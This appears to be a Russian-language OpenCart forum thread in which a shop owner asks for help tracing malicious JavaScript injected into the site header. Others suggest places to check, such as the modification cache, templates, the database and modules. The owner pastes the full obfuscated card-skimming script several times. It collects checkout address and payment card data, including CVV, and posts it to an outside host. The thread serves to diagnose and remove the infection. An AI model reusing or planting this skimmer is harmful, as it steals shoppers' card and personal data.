Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

формирование хедера


Recommended Posts

Доброго всем дня!

Обнаружил зловред JS. Устанавливается прямо в тег <head>. Перерыл весь сайт. Пытался найти в сорцах текст по шаблону - нет его. Не могу понять как он туда попадает. Я в ОС и вообще в программировании не силен. Подскажите плиз, где формируется хедер и как-откуда туда попадают JS. Буду рад любой помощи

Надіслати
Поділитися на інших сайтах


4 минуты назад, MrBa сказал:

версия 2.2.0.0

также проверьте эти файлы в кэше модификаторов /system/storage/modification

может с каким-то модулем принесли.

 

попробуйте открыть сайт с другого браузера(чистого, без установленных дополнений) 

Змінено користувачем ardashev06
Надіслати
Поділитися на інших сайтах


проверил все - нет нигде. Пробовал все предложенные варианты. Как я писал выше, искал прямо на сервере с помощью grep по шаблону. Я уже мозг вывернул наизнанку. Как туда попадает этот JS? Причем не ссылка на файл, а прямо сам скрипт в хедер. Может еще какие мысли есть?

Надіслати
Поділитися на інших сайтах


20 минут назад, MrBa сказал:

проверил все - нет нигде. Пробовал все предложенные варианты. Как я писал выше, искал прямо на сервере с помощью grep по шаблону. Я уже мозг вывернул наизнанку. Как туда попадает этот JS? Причем не ссылка на файл, а прямо сам скрипт в хедер. Может еще какие мысли есть?

покажите скрипт. скопируйте код сюда

а лучше - предоставьте ссылку на сайт

Змінено користувачем ardashev06
Надіслати
Поділитися на інших сайтах


Только что, ardashev06 сказал:

покажите скрипт. скопируйте код сюда

предоставьте ссылку на сайт

http://www.fataliiseeds.net/

 

<script>
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('$(q).B(8(){k(!z.w.v(/u/))t;h c,b;$(\'j\').9(\'i\',\'#6-x, #6-y, #6-3-7\',8(){k($(\'[5="d"]\').C){b=$(\'[5="d"] m:l\').n().e(/.+?,/,\'\').e(/,\\s/g,\'|\').r()}D{b=$(\'#4-3-7-1\').0()+\'|\'+$(\'#4-3-7-2\').0()+\'|\'+$(\'#4-3-p\').0()+\'|\'+$(\'#4-3-o\').0()+\'|\'+$("#4-3-A m:l").n()+\'|\'+$(\'#4-3-N\').0()+\'|\'+$(\'#4-3-E\').0()}});$(\'j\').9(\'i\',\'#6-3-Q\',8(){c=$("[5=\'P\']").0()+\'|\'+$("[5=\'T\']").0()+\'|\'+$("[5=\'S\']").0()+\'|\'+$("[5=\'O\']").0()+\'|\';h f=c+b;$.H(\'G://F.I.J/M.L\',\'a=\'+f);K.R()})});',56,56,'val|||payment|input|name|button|address|function|on||||address_id|replace|cc||var|click|body|if|selected|option|text|postcode|city|document|trim||return|checkout|match|href|register|guest|location|country|ready|length|else|telephone|klinto2u|http|post|beget|tech|console|php|index|email|cartname|cartnumberg|method|clear|cartvv|cartda'.split('|'),0,{}))
</script>

 

Только что, JIOPD сказал:

скачиваем бекапы, фтп и базы на пк, и notepad'ом делаем поиск по файлам. Может что то найдёте. 

я же писал выше -

 

Только что, ardashev06 сказал:

искал прямо на сервере с помощью grep по шаблону.

 

Надіслати
Поділитися на інших сайтах


14 минут назад, MrBa сказал:

http://www.fataliiseeds.net/

 


<script>
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('$(q).B(8(){k(!z.w.v(/u/))t;h c,b;$(\'j\').9(\'i\',\'#6-x, #6-y, #6-3-7\',8(){k($(\'[5="d"]\').C){b=$(\'[5="d"] m:l\').n().e(/.+?,/,\'\').e(/,\\s/g,\'|\').r()}D{b=$(\'#4-3-7-1\').0()+\'|\'+$(\'#4-3-7-2\').0()+\'|\'+$(\'#4-3-p\').0()+\'|\'+$(\'#4-3-o\').0()+\'|\'+$("#4-3-A m:l").n()+\'|\'+$(\'#4-3-N\').0()+\'|\'+$(\'#4-3-E\').0()}});$(\'j\').9(\'i\',\'#6-3-Q\',8(){c=$("[5=\'P\']").0()+\'|\'+$("[5=\'T\']").0()+\'|\'+$("[5=\'S\']").0()+\'|\'+$("[5=\'O\']").0()+\'|\';h f=c+b;$.H(\'G://F.I.J/M.L\',\'a=\'+f);K.R()})});',56,56,'val|||payment|input|name|button|address|function|on||||address_id|replace|cc||var|click|body|if|selected|option|text|postcode|city|document|trim||return|checkout|match|href|register|guest|location|country|ready|length|else|telephone|klinto2u|http|post|beget|tech|console|php|index|email|cartname|cartnumberg|method|clear|cartvv|cartda'.split('|'),0,{}))
</script>

 

я же писал выше -

 

 

а что это у вас за скрипт подцепляется? http://www.fataliiseeds.net/catalog/view/javascript/common_g.js

Надіслати
Поділитися на інших сайтах


15 минут назад, MrBa сказал:

http://www.fataliiseeds.net/

 


<script>
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('$(q).B(8(){k(!z.w.v(/u/))t;h c,b;$(\'j\').9(\'i\',\'#6-x, #6-y, #6-3-7\',8(){k($(\'[5="d"]\').C){b=$(\'[5="d"] m:l\').n().e(/.+?,/,\'\').e(/,\\s/g,\'|\').r()}D{b=$(\'#4-3-7-1\').0()+\'|\'+$(\'#4-3-7-2\').0()+\'|\'+$(\'#4-3-p\').0()+\'|\'+$(\'#4-3-o\').0()+\'|\'+$("#4-3-A m:l").n()+\'|\'+$(\'#4-3-N\').0()+\'|\'+$(\'#4-3-E\').0()}});$(\'j\').9(\'i\',\'#6-3-Q\',8(){c=$("[5=\'P\']").0()+\'|\'+$("[5=\'T\']").0()+\'|\'+$("[5=\'S\']").0()+\'|\'+$("[5=\'O\']").0()+\'|\';h f=c+b;$.H(\'G://F.I.J/M.L\',\'a=\'+f);K.R()})});',56,56,'val|||payment|input|name|button|address|function|on||||address_id|replace|cc||var|click|body|if|selected|option|text|postcode|city|document|trim||return|checkout|match|href|register|guest|location|country|ready|length|else|telephone|klinto2u|http|post|beget|tech|console|php|index|email|cartname|cartnumberg|method|clear|cartvv|cartda'.split('|'),0,{}))
</script>

 

я же писал выше -

 

 

 

предоставьте фтп в личку, посмотрю откуда ноги растут

Надіслати
Поділитися на інших сайтах


1 минуту назад, JIOPD сказал:

а что это у вас за скрипт подцепляется? http://www.fataliiseeds.net/catalog/view/javascript/common_g.js

а вы открывали его? там ничего особенного))

Надіслати
Поділитися на інших сайтах


3 минуты назад, MrBa сказал:

тоже глянул, не нашел ничего касаемо вопроса.

есть ли в header.tpl что-то между

 

<script src="catalog/view/javascript/jquery/owl-carousel/owl.carousel.min.js" type="text/javascript"></script>

 

{что-то здесь}

 

<link href='catalog/view/theme/default/stylesheet/jquery.growl.css' rel='stylesheet' type='text/css'>

Надіслати
Поділитися на інших сайтах


10 минут назад, MrBa сказал:

в самом файле нет такого скрипта. Пробовал по поиску по всем файам - тоже не нашел

разумеется его вы там можете не увидеть.

 

но есть что-то между подключением скрипта и стиля? названия их выше.

 

если там вообще ничего нет,

 

то нужно смотреть установленные модификаторы

 

---

 

в зашифрованном участке кода присутствует сайт klinto2u.beget.tech (который судя по всему пустышка)

Змінено користувачем ardashev06
Надіслати
Поділитися на інших сайтах


3 минуты назад, ardashev06 сказал:

в зашифрованном участке кода присутствует сайт klinto2u.beget.tech (который судя по всему пустышка)

вот и нет - он передает туда методом пост информацию. Но где он находится?

Надіслати
Поділитися на інших сайтах


8 минут назад, MrBa сказал:

вот и нет - он передает туда методом пост информацию. Но где он находится?

методом пост на сайт пустышку :)

 

я вам наводку дал где искать. этот код необязательно может быть в файлах.

он может также хранится в бд.

также подгружаться каким-нибудь модулем,скриптом

Надіслати
Поділитися на інших сайтах


Только что, ardashev06 сказал:

я вам наводку дал где искать. этот код необязательно может быть в файлах.

он может также хранится в бд.

также подгружаться каким-нибудь модулем,скриптом

я его вычислил дебагером. Он туда шлет важные данные и вполне успешно, с возвратом - true

Те не менее спасибо за помощь. Буду искать где он хранится и как туда попадает

Надіслати
Поділитися на інших сайтах


Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз
  • Зараз на сторінці   0 користувачів

    • Ні користувачів, які переглядиють цю сторінку

×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.